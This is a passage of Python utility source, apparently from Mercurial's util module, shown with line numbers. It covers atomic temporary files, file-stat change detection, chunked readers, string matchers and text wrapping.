1892 1898 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1893 1899 os.close(fd)
1894 1900 # Temporary files are created with mode 0600, which is usually not
1895 1901 # what we want. If the original file already exists, just copy
1896 1902 # its mode. Otherwise, manually obey umask.
1897 1903 copymode(name, temp, createmode)
1898 1904 if emptyok:
1899 1905 return temp
1900 1906 try:
1901 1907 try:
1902 1908 ifp = posixfile(name, "rb")
1903 1909 except IOError as inst:
1904 1910 if inst.errno == errno.ENOENT:
1905 1911 return temp
1906 1912 if not getattr(inst, 'filename', None):
1907 1913 inst.filename = name
1908 1914 raise
1909 1915 ofp = posixfile(temp, "wb")
1910 1916 for chunk in filechunkiter(ifp):
1911 1917 ofp.write(chunk)
1912 1918 ifp.close()
1913 1919 ofp.close()
1914 1920 except: # re-raises
1915 1921 try:
1916 1922 os.unlink(temp)
1917 1923 except OSError:
1918 1924 pass
1919 1925 raise
1920 1926 return temp
1921 1927
1922 1928 class filestat(object):
1923 1929 """help to exactly detect change of a file
1924 1930
1925 1931 'stat' attribute is result of 'os.stat()' if specified 'path'
1926 1932 exists. Otherwise, it is None. This can avoid preparative
1927 1933 'exists()' examination on client side of this class.
1928 1934 """
1929 1935 def __init__(self, stat):
1930 1936 self.stat = stat
1931 1937
1932 1938 @classmethod
1933 1939 def frompath(cls, path):
1934 1940 try:
1935 1941 stat = os.stat(path)
1936 1942 except OSError as err:
1937 1943 if err.errno != errno.ENOENT:
1938 1944 raise
1939 1945 stat = None
1940 1946 return cls(stat)
1941 1947
1942 1948 @classmethod
1943 1949 def fromfp(cls, fp):
1944 1950 stat = os.fstat(fp.fileno())
1945 1951 return cls(stat)
1946 1952
1947 1953 __hash__ = object.__hash__
1948 1954
1949 1955 def __eq__(self, old):
1950 1956 try:
1951 1957 # if ambiguity between stat of new and old file is
1952 1958 # avoided, comparison of size, ctime and mtime is enough
1953 1959 # to exactly detect change of a file regardless of platform
1954 1960 return (self.stat.st_size == old.stat.st_size and
1955 1961 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1956 1962 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1957 1963 except AttributeError:
1958 1964 pass
1959 1965 try:
1960 1966 return self.stat is None and old.stat is None
1961 1967 except AttributeError:
1962 1968 return False
1963 1969
1964 1970 def isambig(self, old):
1965 1971 """Examine whether new (= self) stat is ambiguous against old one
1966 1972
1967 1973 "S[N]" below means stat of a file at N-th change:
1968 1974
1969 1975 - S[n-1].ctime < S[n].ctime: can detect change of a file
1970 1976 - S[n-1].ctime == S[n].ctime
1971 1977 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1972 1978 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1973 1979 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1974 1980 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1975 1981
1976 1982 Case (*2) above means that a file was changed twice or more at
1977 1983 same time in sec (= S[n-1].ctime), and comparison of timestamp
1978 1984 is ambiguous.
1979 1985
1980 1986 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1981 1987 timestamp is ambiguous".
1982 1988
1983 1989 But advancing mtime only in case (*2) doesn't work as
1984 1990 expected, because naturally advanced S[n].mtime in case (*1)
1985 1991 might be equal to manually advanced S[n-1 or earlier].mtime.
1986 1992
1987 1993 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1988 1994 treated as ambiguous regardless of mtime, to avoid overlooking
1989 1995 by confliction between such mtime.
1990 1996
1991 1997 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1992 1998 S[n].mtime", even if size of a file isn't changed.
1993 1999 """
1994 2000 try:
1995 2001 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
1996 2002 except AttributeError:
1997 2003 return False
1998 2004
1999 2005 def avoidambig(self, path, old):
2000 2006 """Change file stat of specified path to avoid ambiguity
2001 2007
2002 2008 'old' should be previous filestat of 'path'.
2003 2009
2004 2010 This skips avoiding ambiguity, if a process doesn't have
2005 2011 appropriate privileges for 'path'. This returns False in this
2006 2012 case.
2007 2013
2008 2014 Otherwise, this returns True, as "ambiguity is avoided".
2009 2015 """
2010 2016 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2011 2017 try:
2012 2018 os.utime(path, (advanced, advanced))
2013 2019 except OSError as inst:
2014 2020 if inst.errno == errno.EPERM:
2015 2021 # utime() on the file created by another user causes EPERM,
2016 2022 # if a process doesn't have appropriate privileges
2017 2023 return False
2018 2024 raise
2019 2025 return True
2020 2026
2021 2027 def __ne__(self, other):
2022 2028 return not self == other
2023 2029
2024 2030 class atomictempfile(object):
2025 2031 '''writable file object that atomically updates a file
2026 2032
2027 2033 All writes will go to a temporary copy of the original file. Call
2028 2034 close() when you are done writing, and atomictempfile will rename
2029 2035 the temporary copy to the original name, making the changes
2030 2036 visible. If the object is destroyed without being closed, all your
2031 2037 writes are discarded.
2032 2038
2033 2039 checkambig argument of constructor is used with filestat, and is
2034 2040 useful only if target file is guarded by any lock (e.g. repo.lock
2035 2041 or repo.wlock).
2036 2042 '''
2037 2043 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2038 2044 self.__name = name # permanent name
2039 2045 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2040 2046 createmode=createmode)
2041 2047 self._fp = posixfile(self._tempname, mode)
2042 2048 self._checkambig = checkambig
2043 2049
2044 2050 # delegated methods
2045 2051 self.read = self._fp.read
2046 2052 self.write = self._fp.write
2047 2053 self.seek = self._fp.seek
2048 2054 self.tell = self._fp.tell
2049 2055 self.fileno = self._fp.fileno
2050 2056
2051 2057 def close(self):
2052 2058 if not self._fp.closed:
2053 2059 self._fp.close()
2054 2060 filename = localpath(self.__name)
2055 2061 oldstat = self._checkambig and filestat.frompath(filename)
2056 2062 if oldstat and oldstat.stat:
2057 2063 rename(self._tempname, filename)
2058 2064 newstat = filestat.frompath(filename)
2059 2065 if newstat.isambig(oldstat):
2060 2066 # stat of changed file is ambiguous to original one
2061 2067 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2062 2068 os.utime(filename, (advanced, advanced))
2063 2069 else:
2064 2070 rename(self._tempname, filename)
2065 2071
2066 2072 def discard(self):
2067 2073 if not self._fp.closed:
2068 2074 try:
2069 2075 os.unlink(self._tempname)
2070 2076 except OSError:
2071 2077 pass
2072 2078 self._fp.close()
2073 2079
2074 2080 def __del__(self):
2075 2081 if safehasattr(self, '_fp'): # constructor actually did something
2076 2082 self.discard()
2077 2083
2078 2084 def __enter__(self):
2079 2085 return self
2080 2086
2081 2087 def __exit__(self, exctype, excvalue, traceback):
2082 2088 if exctype is not None:
2083 2089 self.discard()
2084 2090 else:
2085 2091 self.close()
2086 2092
2087 2093 def unlinkpath(f, ignoremissing=False):
2088 2094 """unlink and remove the directory if it is empty"""
2089 2095 if ignoremissing:
2090 2096 tryunlink(f)
2091 2097 else:
2092 2098 unlink(f)
2093 2099 # try removing directories that might now be empty
2094 2100 try:
2095 2101 removedirs(os.path.dirname(f))
2096 2102 except OSError:
2097 2103 pass
2098 2104
2099 2105 def tryunlink(f):
2100 2106 """Attempt to remove a file, ignoring ENOENT errors."""
2101 2107 try:
2102 2108 unlink(f)
2103 2109 except OSError as e:
2104 2110 if e.errno != errno.ENOENT:
2105 2111 raise
2106 2112
2107 2113 def makedirs(name, mode=None, notindexed=False):
2108 2114 """recursive directory creation with parent mode inheritance
2109 2115
2110 2116 Newly created directories are marked as "not to be indexed by
2111 2117 the content indexing service", if ``notindexed`` is specified
2112 2118 for "write" mode access.
2113 2119 """
2114 2120 try:
2115 2121 makedir(name, notindexed)
2116 2122 except OSError as err:
2117 2123 if err.errno == errno.EEXIST:
2118 2124 return
2119 2125 if err.errno != errno.ENOENT or not name:
2120 2126 raise
2121 2127 parent = os.path.dirname(os.path.abspath(name))
2122 2128 if parent == name:
2123 2129 raise
2124 2130 makedirs(parent, mode, notindexed)
2125 2131 try:
2126 2132 makedir(name, notindexed)
2127 2133 except OSError as err:
2128 2134 # Catch EEXIST to handle races
2129 2135 if err.errno == errno.EEXIST:
2130 2136 return
2131 2137 raise
2132 2138 if mode is not None:
2133 2139 os.chmod(name, mode)
2134 2140
2135 2141 def readfile(path):
2136 2142 with open(path, 'rb') as fp:
2137 2143 return fp.read()
2138 2144
2139 2145 def writefile(path, text):
2140 2146 with open(path, 'wb') as fp:
2141 2147 fp.write(text)
2142 2148
2143 2149 def appendfile(path, text):
2144 2150 with open(path, 'ab') as fp:
2145 2151 fp.write(text)
2146 2152
2147 2153 class chunkbuffer(object):
2148 2154 """Allow arbitrary sized chunks of data to be efficiently read from an
2149 2155 iterator over chunks of arbitrary size."""
2150 2156
2151 2157 def __init__(self, in_iter):
2152 2158 """in_iter is the iterator that's iterating over the input chunks."""
2153 2159 def splitbig(chunks):
2154 2160 for chunk in chunks:
2155 2161 if len(chunk) > 2**20:
2156 2162 pos = 0
2157 2163 while pos < len(chunk):
2158 2164 end = pos + 2 ** 18
2159 2165 yield chunk[pos:end]
2160 2166 pos = end
2161 2167 else:
2162 2168 yield chunk
2163 2169 self.iter = splitbig(in_iter)
2164 2170 self._queue = collections.deque()
2165 2171 self._chunkoffset = 0
2166 2172
2167 2173 def read(self, l=None):
2168 2174 """Read L bytes of data from the iterator of chunks of data.
2169 2175 Returns less than L bytes if the iterator runs dry.
2170 2176
2171 2177 If size parameter is omitted, read everything"""
2172 2178 if l is None:
2173 2179 return ''.join(self.iter)
2174 2180
2175 2181 left = l
2176 2182 buf = []
2177 2183 queue = self._queue
2178 2184 while left > 0:
2179 2185 # refill the queue
2180 2186 if not queue:
2181 2187 target = 2**18
2182 2188 for chunk in self.iter:
2183 2189 queue.append(chunk)
2184 2190 target -= len(chunk)
2185 2191 if target <= 0:
2186 2192 break
2187 2193 if not queue:
2188 2194 break
2189 2195
2190 2196 # The easy way to do this would be to queue.popleft(), modify the
2191 2197 # chunk (if necessary), then queue.appendleft(). However, for cases
2192 2198 # where we read partial chunk content, this incurs 2 dequeue
2193 2199 # mutations and creates a new str for the remaining chunk in the
2194 2200 # queue. Our code below avoids this overhead.
2195 2201
2196 2202 chunk = queue[0]
2197 2203 chunkl = len(chunk)
2198 2204 offset = self._chunkoffset
2199 2205
2200 2206 # Use full chunk.
2201 2207 if offset == 0 and left >= chunkl:
2202 2208 left -= chunkl
2203 2209 queue.popleft()
2204 2210 buf.append(chunk)
2205 2211 # self._chunkoffset remains at 0.
2206 2212 continue
2207 2213
2208 2214 chunkremaining = chunkl - offset
2209 2215
2210 2216 # Use all of unconsumed part of chunk.
2211 2217 if left >= chunkremaining:
2212 2218 left -= chunkremaining
2213 2219 queue.popleft()
2214 2220 # offset == 0 is enabled by block above, so this won't merely
2215 2221 # copy via ``chunk[0:]``.
2216 2222 buf.append(chunk[offset:])
2217 2223 self._chunkoffset = 0
2218 2224
2219 2225 # Partial chunk needed.
2220 2226 else:
2221 2227 buf.append(chunk[offset:offset + left])
2222 2228 self._chunkoffset += left
2223 2229 left -= chunkremaining
2224 2230
2225 2231 return ''.join(buf)
2226 2232
2227 2233 def filechunkiter(f, size=131072, limit=None):
2228 2234 """Create a generator that produces the data in the file size
2229 2235 (default 131072) bytes at a time, up to optional limit (default is
2230 2236 to read all data). Chunks may be less than size bytes if the
2231 2237 chunk is the last chunk in the file, or the file is a socket or
2232 2238 some other type of file that sometimes reads less data than is
2233 2239 requested."""
2234 2240 assert size >= 0
2235 2241 assert limit is None or limit >= 0
2236 2242 while True:
2237 2243 if limit is None:
2238 2244 nbytes = size
2239 2245 else:
2240 2246 nbytes = min(limit, size)
2241 2247 s = nbytes and f.read(nbytes)
2242 2248 if not s:
2243 2249 break
2244 2250 if limit:
2245 2251 limit -= len(s)
2246 2252 yield s
2247 2253
2248 2254 class cappedreader(object):
2249 2255 """A file object proxy that allows reading up to N bytes.
2250 2256
2251 2257 Given a source file object, instances of this type allow reading up to
2252 2258 N bytes from that source file object. Attempts to read past the allowed
2253 2259 limit are treated as EOF.
2254 2260
2255 2261 It is assumed that I/O is not performed on the original file object
2256 2262 in addition to I/O that is performed by this instance. If there is,
2257 2263 state tracking will get out of sync and unexpected results will ensue.
2258 2264 """
2259 2265 def __init__(self, fh, limit):
2260 2266 """Allow reading up to <limit> bytes from <fh>."""
2261 2267 self._fh = fh
2262 2268 self._left = limit
2263 2269
2264 2270 def read(self, n=-1):
2265 2271 if not self._left:
2266 2272 return b''
2267 2273
2268 2274 if n < 0:
2269 2275 n = self._left
2270 2276
2271 2277 data = self._fh.read(min(n, self._left))
2272 2278 self._left -= len(data)
2273 2279 assert self._left >= 0
2274 2280
2275 2281 return data
2276 2282
2277 2283 def stringmatcher(pattern, casesensitive=True):
2278 2284 """
2279 2285 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2280 2286 returns the matcher name, pattern, and matcher function.
2281 2287 missing or unknown prefixes are treated as literal matches.
2282 2288
2283 2289 helper for tests:
2284 2290 >>> def test(pattern, *tests):
2285 2291 ... kind, pattern, matcher = stringmatcher(pattern)
2286 2292 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2287 2293 >>> def itest(pattern, *tests):
2288 2294 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2289 2295 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2290 2296
2291 2297 exact matching (no prefix):
2292 2298 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2293 2299 ('literal', 'abcdefg', [False, False, True])
2294 2300
2295 2301 regex matching ('re:' prefix)
2296 2302 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2297 2303 ('re', 'a.+b', [False, False, True])
2298 2304
2299 2305 force exact matches ('literal:' prefix)
2300 2306 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2301 2307 ('literal', 're:foobar', [False, True])
2302 2308
2303 2309 unknown prefixes are ignored and treated as literals
2304 2310 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2305 2311 ('literal', 'foo:bar', [False, False, True])
2306 2312
2307 2313 case insensitive regex matches
2308 2314 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2309 2315 ('re', 'A.+b', [False, False, True])
2310 2316
2311 2317 case insensitive literal matches
2312 2318 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2313 2319 ('literal', 'ABCDEFG', [False, False, True])
2314 2320 """
2315 2321 if pattern.startswith('re:'):
2316 2322 pattern = pattern[3:]
2317 2323 try:
2318 2324 flags = 0
2319 2325 if not casesensitive:
2320 2326 flags = remod.I
2321 2327 regex = remod.compile(pattern, flags)
2322 2328 except remod.error as e:
2323 2329 raise error.ParseError(_('invalid regular expression: %s')
2324 2330 % e)
2325 2331 return 're', pattern, regex.search
2326 2332 elif pattern.startswith('literal:'):
2327 2333 pattern = pattern[8:]
2328 2334
2329 2335 match = pattern.__eq__
2330 2336
2331 2337 if not casesensitive:
2332 2338 ipat = encoding.lower(pattern)
2333 2339 match = lambda s: ipat == encoding.lower(s)
2334 2340 return 'literal', pattern, match
2335 2341
2336 2342 def shortuser(user):
2337 2343 """Return a short representation of a user name or email address."""
2338 2344 f = user.find('@')
2339 2345 if f >= 0:
2340 2346 user = user[:f]
2341 2347 f = user.find('<')
2342 2348 if f >= 0:
2343 2349 user = user[f + 1:]
2344 2350 f = user.find(' ')
2345 2351 if f >= 0:
2346 2352 user = user[:f]
2347 2353 f = user.find('.')
2348 2354 if f >= 0:
2349 2355 user = user[:f]
2350 2356 return user
2351 2357
2352 2358 def emailuser(user):
2353 2359 """Return the user portion of an email address."""
2354 2360 f = user.find('@')
2355 2361 if f >= 0:
2356 2362 user = user[:f]
2357 2363 f = user.find('<')
2358 2364 if f >= 0:
2359 2365 user = user[f + 1:]
2360 2366 return user
2361 2367
2362 2368 def email(author):
2363 2369 '''get email of author.'''
2364 2370 r = author.find('>')
2365 2371 if r == -1:
2366 2372 r = None
2367 2373 return author[author.find('<') + 1:r]
2368 2374
2369 2375 def ellipsis(text, maxlength=400):
2370 2376 """Trim string to at most maxlength (default: 400) columns in display."""
2371 2377 return encoding.trim(text, maxlength, ellipsis='...')
2372 2378
2373 2379 def unitcountfn(*unittable):
2374 2380 '''return a function that renders a readable count of some quantity'''
2375 2381
2376 2382 def go(count):
2377 2383 for multiplier, divisor, format in unittable:
2378 2384 if abs(count) >= divisor * multiplier:
2379 2385 return format % (count / float(divisor))
2380 2386 return unittable[-1][2] % count
2381 2387
2382 2388 return go
2383 2389
2384 2390 def processlinerange(fromline, toline):
2385 2391 """Check that linerange <fromline>:<toline> makes sense and return a
2386 2392 0-based range.
2387 2393
2388 2394 >>> processlinerange(10, 20)
2389 2395 (9, 20)
2390 2396 >>> processlinerange(2, 1)
2391 2397 Traceback (most recent call last):
2392 2398 ...
2393 2399 ParseError: line range must be positive
2394 2400 >>> processlinerange(0, 5)
2395 2401 Traceback (most recent call last):
2396 2402 ...
2397 2403 ParseError: fromline must be strictly positive
2398 2404 """
2399 2405 if toline - fromline < 0:
2400 2406 raise error.ParseError(_("line range must be positive"))
2401 2407 if fromline < 1:
2402 2408 raise error.ParseError(_("fromline must be strictly positive"))
2403 2409 return fromline - 1, toline
2404 2410
2405 2411 bytecount = unitcountfn(
2406 2412 (100, 1 << 30, _('%.0f GB')),
2407 2413 (10, 1 << 30, _('%.1f GB')),
2408 2414 (1, 1 << 30, _('%.2f GB')),
2409 2415 (100, 1 << 20, _('%.0f MB')),
2410 2416 (10, 1 << 20, _('%.1f MB')),
2411 2417 (1, 1 << 20, _('%.2f MB')),
2412 2418 (100, 1 << 10, _('%.0f KB')),
2413 2419 (10, 1 << 10, _('%.1f KB')),
2414 2420 (1, 1 << 10, _('%.2f KB')),
2415 2421 (1, 1, _('%.0f bytes')),
2416 2422 )
2417 2423
2418 2424 # Matches a single EOL which can either be a CRLF where repeated CR
2419 2425 # are removed or a LF. We do not care about old Macintosh files, so a
2420 2426 # stray CR is an error.
2421 2427 _eolre = remod.compile(br'\r*\n')
2422 2428
2423 2429 def tolf(s):
2424 2430 return _eolre.sub('\n', s)
2425 2431
2426 2432 def tocrlf(s):
2427 2433 return _eolre.sub('\r\n', s)
2428 2434
2429 2435 if pycompat.oslinesep == '\r\n':
2430 2436 tonativeeol = tocrlf
2431 2437 fromnativeeol = tolf
2432 2438 else:
2433 2439 tonativeeol = pycompat.identity
2434 2440 fromnativeeol = pycompat.identity
2435 2441
2436 2442 def escapestr(s):
2437 2443 # call underlying function of s.encode('string_escape') directly for
2438 2444 # Python 3 compatibility
2439 2445 return codecs.escape_encode(s)[0]
2440 2446
2441 2447 def unescapestr(s):
2442 2448 return codecs.escape_decode(s)[0]
2443 2449
2444 2450 def forcebytestr(obj):
2445 2451 """Portably format an arbitrary object (e.g. exception) into a byte
2446 2452 string."""
2447 2453 try:
2448 2454 return pycompat.bytestr(obj)
2449 2455 except UnicodeEncodeError:
2450 2456 # non-ascii string, may be lossy
2451 2457 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2452 2458
2453 2459 def uirepr(s):
2454 2460 # Avoid double backslash in Windows path repr()
2455 2461 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2456 2462
2457 2463 # delay import of textwrap
2458 2464 def MBTextWrapper(**kwargs):
2459 2465 class tw(textwrap.TextWrapper):
2460 2466 """
2461 2467 Extend TextWrapper for width-awareness.
2462 2468
2463 2469 Neither number of 'bytes' in any encoding nor 'characters' is
2464 2470 appropriate to calculate terminal columns for specified string.
2465 2471
2466 2472 Original TextWrapper implementation uses built-in 'len()' directly,
2467 2473 so overriding is needed to use width information of each characters.
2468 2474
2469 2475 In addition, characters classified into 'ambiguous' width are
2470 2476 treated as wide in East Asian area, but as narrow in other.
2471 2477
2472 2478 This requires use decision to determine width of such characters.
2473 2479 """
2474 2480 def _cutdown(self, ucstr, space_left):
2475 2481 l = 0
2476 2482 colwidth = encoding.ucolwidth
2477 2483 for i in xrange(len(ucstr)):
2478 2484 l += colwidth(ucstr[i])
2479 2485 if space_left < l:
2480 2486 return (ucstr[:i], ucstr[i:])
2481 2487 return ucstr, ''
2482 2488
2483 2489 # overriding of base class
2484 2490 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2485 2491 space_left = max(width - cur_len, 1)
2486 2492
2487 2493 if self.break_long_words:
2488 2494 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2489 2495 cur_line.append(cut)
2490 2496 reversed_chunks[-1] = res
2491 2497 elif not cur_line:
2492 2498 cur_line.append(reversed_chunks.pop())
2493 2499
2494 2500 # this overriding code is imported from TextWrapper of Python 2.6
2495 2501 # to calculate columns of string by 'encoding.ucolwidth()'
2496 2502 def _wrap_chunks(self, chunks):
2497 2503 colwidth = encoding.ucolwidth
2498 2504
2499 2505 lines = []
2500 2506 if self.width <= 0:
2501 2507 raise ValueError("invalid width %r (must be > 0)" % self.width)
2502 2508
2503 2509 # Arrange in reverse order so items can be efficiently popped
2504 2510 # from a stack of chucks.
2505 2511 chunks.reverse()
2506 2512
2507 2513 while chunks:
2508 2514
2509 2515 # Start the list of chunks that will make up the current line.
2510 2516 # cur_len is just the length of all the chunks in cur_line.
2511 2517 cur_line = []
2512 2518 cur_len = 0
2513 2519
2514 2520 # Figure out which static string will prefix this line.
2515 2521 if lines:
2516 2522 indent = self.subsequent_indent
2517 2523 else:
2518 2524 indent = self.initial_indent
2519 2525
2520 2526 # Maximum width for this line.
2521 2527 width = self.width - len(indent)
2522 2528
2523 2529 # First chunk on line is whitespace -- drop it, unless this
2524 2530 # is the very beginning of the text (i.e. no lines started yet).
2525 2531 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2526 2532 del chunks[-1]
2527 2533
2528 2534 while chunks:
2529 2535 l = colwidth(chunks[-1])
2530 2536
2531 2537 # Can at least squeeze this chunk onto the current line.
2532 2538 if cur_len + l <= width:
2533 2539 cur_line.append(chunks.pop())
2534 2540 cur_len += l
2535 2541
2536 2542 # Nope, this line is full.
2537 2543 else:
2538 2544 break
2539 2545
2540 2546 # The current line is full, and the next chunk is too big to
2541 2547 # fit on *any* line (not just this one).
2542 2548 if chunks and colwidth(chunks[-1]) > width:
2543 2549 self._handle_long_word(chunks, cur_line, cur_len, width)
2544 2550
2545 2551 # If the last chunk on this line is all whitespace, drop it.
2546 2552 if (self.drop_whitespace and
2547 2553 cur_line and cur_line[-1].strip() == r''):
2548 2554 del cur_line[-1]
2549 2555
2550 2556 # Convert current line back to a string and store it in list
2551 2557 # of all lines (return value).
2552 2558 if cur_line:
2553 2559 lines.append(indent + r''.join(cur_line))
2554 2560
2555 2561 return lines
2556 2562
2557 2563 global MBTextWrapper
2558 2564 MBTextWrapper = tw
2559 2565 return tw(**kwargs)
2560 2566
2561 2567 def wrap(line, width, initindent='', hangindent=''):
2562 2568 maxindent = max(len(hangindent), len(initindent))
2563 2569 if width <= maxindent:
2564 2570 # adjust for weird terminal size
2565 2571 width = max(78, maxindent + 1)
2566 2572 line = line.decode(pycompat.sysstr(encoding.encoding),
2567 2573 pycompat.sysstr(encoding.encodingmode))
2568 2574 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2569 2575 pycompat.sysstr(encoding.encodingmode))
2570 2576 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2571 2577 pycompat.sysstr(encoding.encodingmode))
2572 2578 wrapper = MBTextWrapper(width=width,
2573 2579 initial_indent=initindent,
2574 2580 subsequent_indent=hangindent)
2575 2581 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2576 2582
2577 2583 if (pyplatform.python_implementation() == 'CPython' and
2578 2584 sys.version_info < (3, 0)):
2579 2585 # There is an issue in CPython that some IO methods do not handle EINTR
2580 2586 # correctly. The following table shows what CPython version (and functions)
2581 2587 # are affected (buggy: has the EINTR bug, okay: otherwise):
2582 2588 #
2583 2589 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2584 2590 # --------------------------------------------------
2585 2591 # fp.__iter__ | buggy | buggy | okay
2586 2592 # fp.read* | buggy | okay [1] | okay
2587 2593 #
2588 2594 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2589 2595 #
2590 2596 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2591 2597 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2592 2598 #
2593 2599 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2594 2600 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2595 2601 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2596 2602 # fp.__iter__ but not other fp.read* methods.
2597 2603 #
2598 2604 # On modern systems like Linux, the "read" syscall cannot be interrupted
2599 2605 # when reading "fast" files like on-disk files. So the EINTR issue only
2600 2606 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2601 2607 # files approximately as "fast" files and use the fast (unsafe) code path,
2602 2608 # to minimize the performance impact.
2603 2609 if sys.version_info >= (2, 7, 4):
2604 2610 # fp.readline deals with EINTR correctly, use it as a workaround.
2605 2611 def _safeiterfile(fp):
2606 2612 return iter(fp.readline, '')
2607 2613 else:
2608 2614 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2609 2615 # note: this may block longer than necessary because of bufsize.
2610 2616 def _safeiterfile(fp, bufsize=4096):
2611 2617 fd = fp.fileno()
2612 2618 line = ''
2613 2619 while True:
2614 2620 try:
2615 2621 buf = os.read(fd, bufsize)
2616 2622 except OSError as ex:
2617 2623 # os.read only raises EINTR before any data is read
2618 2624 if ex.errno == errno.EINTR:
2619 2625 continue
2620 2626 else:
2621 2627 raise
2622 2628 line += buf
2623 2629 if '\n' in buf:
2624 2630 splitted = line.splitlines(True)
2625 2631 line = ''
2626 2632 for l in splitted:
2627 2633 if l[-1] == '\n':
2628 2634 yield l
2629 2635 else:
2630 2636 line = l
2631 2637 if not buf:
2632 2638 break
2633 2639 if line:
2634 2640 yield line
2635 2641
2636 2642 def iterfile(fp):
2637 2643 fastpath = True
2638 2644 if type(fp) is file:
2639 2645 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2640 2646 if fastpath:
2641 2647 return fp
2642 2648 else:
2643 2649 return _safeiterfile(fp)
2644 2650 else:
2645 2651 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2646 2652 def iterfile(fp):
2647 2653 return fp
2648 2654
2649 2655 def iterlines(iterator):
2650 2656 for chunk in iterator:
2651 2657 for line in chunk.splitlines():
2652 2658 yield line
2653 2659
2654 2660 def expandpath(path):
2655 2661 return os.path.expanduser(os.path.expandvars(path))
2656 2662
2657 2663 def hgcmd():
2658 2664 """Return the command used to execute current hg
2659 2665
2660 2666 This is different from hgexecutable() because on Windows we want
2661 2667 to avoid things opening new shell windows like batch files, so we
2662 2668 get either the python call or current executable.
2663 2669 """
2664 2670 if mainfrozen():
2665 2671 if getattr(sys, 'frozen', None) == 'macosx_app':
2666 2672 # Env variable set by py2app
2667 2673 return [encoding.environ['EXECUTABLEPATH']]
2668 2674 else:
2669 2675 return [pycompat.sysexecutable]
2670 2676 return gethgcmd()
2671 2677
2672 2678 def rundetached(args, condfn):
2673 2679 """Execute the argument list in a detached process.
2674 2680
2675 2681 condfn is a callable which is called repeatedly and should return
2676 2682 True once the child process is known to have started successfully.
2677 2683 At this point, the child process PID is returned. If the child
2678 2684 process fails to start or finishes before condfn() evaluates to
2679 2685 True, return -1.
2680 2686 """
2681 2687 # Windows case is easier because the child process is either
2682 2688 # successfully starting and validating the condition or exiting
2683 2689 # on failure. We just poll on its PID. On Unix, if the child
2684 2690 # process fails to start, it will be left in a zombie state until
2685 2691 # the parent wait on it, which we cannot do since we expect a long
2686 2692 # running process on success. Instead we listen for SIGCHLD telling
2687 2693 # us our child process terminated.
2688 2694 terminated = set()
2689 2695 def handler(signum, frame):
2690 2696 terminated.add(os.wait())
2691 2697 prevhandler = None
2692 2698 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2693 2699 if SIGCHLD is not None:
2694 2700 prevhandler = signal.signal(SIGCHLD, handler)
2695 2701 try:
2696 2702 pid = spawndetached(args)
2697 2703 while not condfn():
2698 2704 if ((pid in terminated or not testpid(pid))
2699 2705 and not condfn()):
2700 2706 return -1
2701 2707 time.sleep(0.1)
2702 2708 return pid
2703 2709 finally:
2704 2710 if prevhandler is not None:
2705 2711 signal.signal(signal.SIGCHLD, prevhandler)
2706 2712
2707 2713 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2708 2714 """Return the result of interpolating items in the mapping into string s.
2709 2715
2710 2716 prefix is a single character string, or a two character string with
2711 2717 a backslash as the first character if the prefix needs to be escaped in
2712 2718 a regular expression.
2713 2719
2714 2720 fn is an optional function that will be applied to the replacement text
2715 2721 just before replacement.
2716 2722
2717 2723 escape_prefix is an optional flag that allows using doubled prefix for
2718 2724 its escaping.
2719 2725 """
2720 2726 fn = fn or (lambda s: s)
2721 2727 patterns = '|'.join(mapping.keys())
2722 2728 if escape_prefix:
2723 2729 patterns += '|' + prefix
2724 2730 if len(prefix) > 1:
2725 2731 prefix_char = prefix[1:]
2726 2732 else:
2727 2733 prefix_char = prefix
2728 2734 mapping[prefix_char] = prefix_char
2729 2735 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2730 2736 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2731 2737
2732 2738 def getport(port):
2733 2739 """Return the port for a given network service.
2734 2740
2735 2741 If port is an integer, it's returned as is. If it's a string, it's
2736 2742 looked up using socket.getservbyname(). If there's no matching
2737 2743 service, error.Abort is raised.
2738 2744 """
